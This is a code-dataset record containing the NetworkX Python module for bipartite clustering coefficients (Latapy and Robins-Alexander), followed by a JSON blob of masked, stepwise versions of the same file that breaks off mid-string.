cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in (set(G[u]) - set([v])):
paths += len(set(G[w]) - set([v, u]))
return paths / 2
<|reserved_special_token_1|>
#-*- coding: utf-8 -*-
# Copyright (C) 2011 by
# Jordi Torrents <jtorrents@milnou.net>
# Aric Hagberg <hagberg@lanl.gov>
# All rights reserved.
# BSD license.
import itertools
import networkx as nx
__author__ = """\n""".join(['Jordi Torrents <jtorrents@milnou.net>',
'Aric Hagberg (hagberg@lanl.gov)'])
__all__ = ['clustering',
'average_clustering',
'latapy_clustering',
'robins_alexander_clustering']
# functions for computing clustering of pairs
def cc_dot(nu, nv):
return float(len(nu & nv)) / len(nu | nv)
def cc_max(nu, nv):
return float(len(nu & nv)) / max(len(nu), len(nv))
def cc_min(nu, nv):
return float(len(nu & nv)) / min(len(nu), len(nv))
modes = {'dot': cc_dot,
'min': cc_min,
'max': cc_max}
def latapy_clustering(G, nodes=None, mode='dot'):
r"""Compute a bipartite clustering coefficient for nodes.
The bipartie clustering coefficient is a measure of local density
of connections defined as [1]_:
.. math::
c_u = \frac{\sum_{v \in N(N(u))} c_{uv} }{|N(N(u))|}
where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`,
and `c_{uv}` is the pairwise clustering coefficient between nodes
`u` and `v`.
The mode selects the function for `c_{uv}` which can be:
`dot`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{|N(u) \cup N(v)|}
`min`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{min(|N(u)|,|N(v)|)}
`max`:
.. math::
c_{uv}=\frac{|N(u)\cap N(v)|}{max(|N(u)|,|N(v)|)}
Parameters
----------
G : graph
A bipartite graph
nodes : list or iterable (optional)
Compute bipartite clustering for these nodes. The default
is all nodes in G.
mode : string
The pariwise bipartite clustering method to be used in the computation.
It must be "dot", "max", or "min".
Returns
-------
clustering : dictionary
A dictionary keyed by node with the clustering coefficient value.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.path_graph(4) # path graphs are bipartite
>>> c = bipartite.clustering(G)
>>> c[0]
0.5
>>> c = bipartite.clustering(G,mode='min')
>>> c[0]
1.0
See Also
--------
robins_alexander_clustering
square_clustering
average_clustering
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if not nx.algorithms.bipartite.is_bipartite(G):
raise nx.NetworkXError("Graph is not bipartite")
try:
cc_func = modes[mode]
except KeyError:
raise nx.NetworkXError(
"Mode for bipartite clustering must be: dot, min or max")
if nodes is None:
nodes = G
ccs = {}
for v in nodes:
cc = 0.0
nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])
for u in nbrs2:
cc += cc_func(set(G[u]), set(G[v]))
if cc > 0.0: # len(nbrs2)>0
cc /= len(nbrs2)
ccs[v] = cc
return ccs
clustering = latapy_clustering
def average_clustering(G, nodes=None, mode='dot'):
r"""Compute the average bipartite clustering coefficient.
A clustering coefficient for the whole graph is the average,
.. math::
C = \frac{1}{n}\sum_{v \in G} c_v,
where `n` is the number of nodes in `G`.
Similar measures for the two bipartite sets can be defined [1]_
.. math::
C_X = \frac{1}{|X|}\sum_{v \in X} c_v,
where `X` is a bipartite set of `G`.
Parameters
----------
G : graph
a bipartite graph
nodes : list or iterable, optional
A container of nodes to use in computing the average.
The nodes should be either the entire graph (the default) or one of the
bipartite sets.
mode : string
The pariwise bipartite clustering method.
It must be "dot", "max", or "min"
Returns
-------
clustering : float
The average bipartite clustering for the given set of nodes or the
entire graph if no nodes are specified.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G=nx.star_graph(3) # star graphs are bipartite
>>> bipartite.average_clustering(G)
0.75
>>> X,Y=bipartite.sets(G)
>>> bipartite.average_clustering(G,X)
0.0
>>> bipartite.average_clustering(G,Y)
1.0
See Also
--------
clustering
Notes
-----
The container of nodes passed to this function must contain all of the nodes
in one of the bipartite sets ("top" or "bottom") in order to compute
the correct average bipartite clustering coefficients.
See :mod:`bipartite documentation <networkx.algorithms.bipartite>`
for further details on how bipartite graphs are handled in NetworkX.
References
----------
.. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).
Basic notions for the analysis of large two-mode networks.
Social Networks 30(1), 31--48.
"""
if nodes is None:
nodes = G
ccs = latapy_clustering(G, nodes=nodes, mode=mode)
return float(sum(ccs[v] for v in nodes)) / len(nodes)
def robins_alexander_clustering(G):
r"""Compute the bipartite clustering of G.
Robins and Alexander [1]_ defined bipartite clustering coefficient as
four times the number of four cycles `C_4` divided by the number of
three paths `L_3` in a bipartite graph:
.. math::
CC_4 = \frac{4 * C_4}{L_3}
Parameters
----------
G : graph
a bipartite graph
Returns
-------
clustering : float
The Robins and Alexander bipartite clustering for the input graph.
Examples
--------
>>> from networkx.algorithms import bipartite
>>> G = nx.davis_southern_women_graph()
>>> print(round(bipartite.robins_alexander_clustering(G), 3))
0.468
See Also
--------
latapy_clustering
square_clustering
References
----------
.. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking
directors: Network structure and distance in bipartite graphs.
Computational & Mathematical Organization Theory 10(1), 69–94.
"""
if G.order() < 4 or G.size() < 3:
return 0
L_3 = _threepaths(G)
if L_3 == 0:
return 0
C_4 = _four_cycles(G)
return (4. * C_4) / L_3
def _four_cycles(G):
cycles = 0
for v in G:
for u, w in itertools.combinations(G[v], 2):
cycles += len((set(G[u]) & set(G[w])) - set([v]))
return cycles / 4
def _threepaths(G):
paths = 0
for v in G:
for u in G[v]:
for w in set(G[u]) - set([v]):
paths += len(set(G[w]) - set([v, u]))
# Divide by two because we count each three path twice
# one for each possible starting point
return paths / 2
|
flexible
|
{
"blob_id": "a21c132ba9f24ff2c695bf66cae074705025d6b1",
"index": 8063,
"step-1": "<mask token>\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\n<mask token>\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\n<mask token>\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". \n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\n<mask token>\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-3": "<mask token>\n__author__ = '\\n'.join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering', 'average_clustering', 'latapy_clustering',\n 'robins_alexander_clustering']\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". \n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-4": "import itertools\nimport networkx as nx\n__author__ = '\\n'.join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering', 'average_clustering', 'latapy_clustering',\n 'robins_alexander_clustering']\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot, 'min': cc_min, 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\\\frac{\\\\sum_{v \\\\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{|N(u) \\\\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\\\frac{|N(u)\\\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". \n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if not nx.algorithms.bipartite.is_bipartite(G):\n raise nx.NetworkXError('Graph is not bipartite')\n try:\n cc_func = modes[mode]\n except KeyError:\n raise nx.NetworkXError(\n 'Mode for bipartite clustering must be: dot, min or max')\n if nodes is None:\n nodes = G\n ccs = {}\n for v in nodes:\n cc = 0.0\n nbrs2 = set([u for nbr in G[v] for u in G[nbr]]) - set([v])\n for u in nbrs2:\n cc += cc_func(set(G[u]), set(G[v]))\n if cc > 0.0:\n cc /= len(nbrs2)\n ccs[v] = cc\n return ccs\n\n\nclustering = latapy_clustering\n\n\ndef average_clustering(G, nodes=None, mode='dot'):\n \"\"\"Compute the average bipartite clustering coefficient.\n\n A clustering coefficient for the whole graph is the average, \n\n .. math::\n\n C = \\\\frac{1}{n}\\\\sum_{v \\\\in G} c_v,\n\n where `n` is the number of nodes in `G`.\n\n Similar measures for the two bipartite sets can be defined [1]_\n\n .. math::\n\n C_X = \\\\frac{1}{|X|}\\\\sum_{v \\\\in X} c_v,\n\n where `X` is a bipartite set of `G`.\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n nodes : list or iterable, optional\n A container of nodes to use in computing the average. \n The nodes should be either the entire graph (the default) or one of the \n bipartite sets.\n\n mode : string\n The pariwise bipartite clustering method. \n It must be \"dot\", \"max\", or \"min\" \n\n Returns\n -------\n clustering : float\n The average bipartite clustering for the given set of nodes or the \n entire graph if no nodes are specified.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G=nx.star_graph(3) # star graphs are bipartite\n >>> bipartite.average_clustering(G) \n 0.75\n >>> X,Y=bipartite.sets(G)\n >>> bipartite.average_clustering(G,X) \n 0.0\n >>> bipartite.average_clustering(G,Y) \n 1.0\n\n See Also\n --------\n clustering\n\n Notes \n -----\n The container of nodes passed to this function must contain all of the nodes\n in one of the bipartite sets (\"top\" or \"bottom\") in order to compute \n the correct average bipartite clustering coefficients.\n See :mod:`bipartite documentation <networkx.algorithms.bipartite>`\n for further details on how bipartite graphs are handled in NetworkX.\n\n\n References\n ----------\n .. [1] Latapy, Matthieu, Clémence Magnien, and Nathalie Del Vecchio (2008).\n Basic notions for the analysis of large two-mode networks. \n Social Networks 30(1), 31--48.\n \"\"\"\n if nodes is None:\n nodes = G\n ccs = latapy_clustering(G, nodes=nodes, mode=mode)\n return float(sum(ccs[v] for v in nodes)) / len(nodes)\n\n\ndef robins_alexander_clustering(G):\n \"\"\"Compute the bipartite clustering of G.\n\n Robins and Alexander [1]_ defined bipartite clustering coefficient as\n four times the number of four cycles `C_4` divided by the number of\n three paths `L_3` in a bipartite graph:\n\n .. math::\n\n CC_4 = \\\\frac{4 * C_4}{L_3}\n\n Parameters\n ----------\n G : graph\n a bipartite graph\n\n Returns\n -------\n clustering : float\n The Robins and Alexander bipartite clustering for the input graph.\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.davis_southern_women_graph()\n >>> print(round(bipartite.robins_alexander_clustering(G), 3))\n 0.468\n\n See Also\n --------\n latapy_clustering\n square_clustering\n\n References\n ----------\n .. [1] Robins, G. and M. Alexander (2004). Small worlds among interlocking \n directors: Network structure and distance in bipartite graphs. \n Computational & Mathematical Organization Theory 10(1), 69–94.\n\n \"\"\"\n if G.order() < 4 or G.size() < 3:\n return 0\n L_3 = _threepaths(G)\n if L_3 == 0:\n return 0\n C_4 = _four_cycles(G)\n return 4.0 * C_4 / L_3\n\n\ndef _four_cycles(G):\n cycles = 0\n for v in G:\n for u, w in itertools.combinations(G[v], 2):\n cycles += len((set(G[u]) & set(G[w])) - set([v]))\n return cycles / 4\n\n\ndef _threepaths(G):\n paths = 0\n for v in G:\n for u in G[v]:\n for w in (set(G[u]) - set([v])):\n paths += len(set(G[w]) - set([v, u]))\n return paths / 2\n",
"step-5": "#-*- coding: utf-8 -*-\n# Copyright (C) 2011 by\n# Jordi Torrents <jtorrents@milnou.net>\n# Aric Hagberg <hagberg@lanl.gov>\n# All rights reserved.\n# BSD license.\nimport itertools\nimport networkx as nx\n__author__ = \"\"\"\\n\"\"\".join(['Jordi Torrents <jtorrents@milnou.net>',\n 'Aric Hagberg (hagberg@lanl.gov)'])\n__all__ = ['clustering',\n 'average_clustering',\n 'latapy_clustering',\n 'robins_alexander_clustering']\n\n# functions for computing clustering of pairs\n\n\ndef cc_dot(nu, nv):\n return float(len(nu & nv)) / len(nu | nv)\n\n\ndef cc_max(nu, nv):\n return float(len(nu & nv)) / max(len(nu), len(nv))\n\n\ndef cc_min(nu, nv):\n return float(len(nu & nv)) / min(len(nu), len(nv))\n\n\nmodes = {'dot': cc_dot,\n 'min': cc_min,\n 'max': cc_max}\n\n\ndef latapy_clustering(G, nodes=None, mode='dot'):\n r\"\"\"Compute a bipartite clustering coefficient for nodes.\n\n The bipartie clustering coefficient is a measure of local density\n of connections defined as [1]_:\n\n .. math::\n\n c_u = \\frac{\\sum_{v \\in N(N(u))} c_{uv} }{|N(N(u))|}\n\n where `N(N(u))` are the second order neighbors of `u` in `G` excluding `u`, \n and `c_{uv}` is the pairwise clustering coefficient between nodes \n `u` and `v`.\n\n The mode selects the function for `c_{uv}` which can be:\n\n `dot`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{|N(u) \\cup N(v)|}\n\n `min`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{min(|N(u)|,|N(v)|)}\n\n `max`: \n\n .. math::\n\n c_{uv}=\\frac{|N(u)\\cap N(v)|}{max(|N(u)|,|N(v)|)}\n\n\n Parameters\n ----------\n G : graph\n A bipartite graph\n\n nodes : list or iterable (optional)\n Compute bipartite clustering for these nodes. The default \n is all nodes in G.\n\n mode : string\n The pariwise bipartite clustering method to be used in the computation.\n It must be \"dot\", \"max\", or \"min\". \n\n Returns\n -------\n clustering : dictionary\n A dictionary keyed by node with the clustering coefficient value.\n\n\n Examples\n --------\n >>> from networkx.algorithms import bipartite\n >>> G = nx.path_graph(4) # path graphs are bipartite\n >>> c = bipartite.clustering(G) \n >>> c[0]\n 0.5\n >>> c = bipartite.clustering(G,mode='min') \n >>> c[0]\n 1.0\n\n See Also\n --------\n robins_alexander_clustering\n square_clustering\n average_clustering\n\n References\n ----------\n .. [1] Latapy, Matthieu, 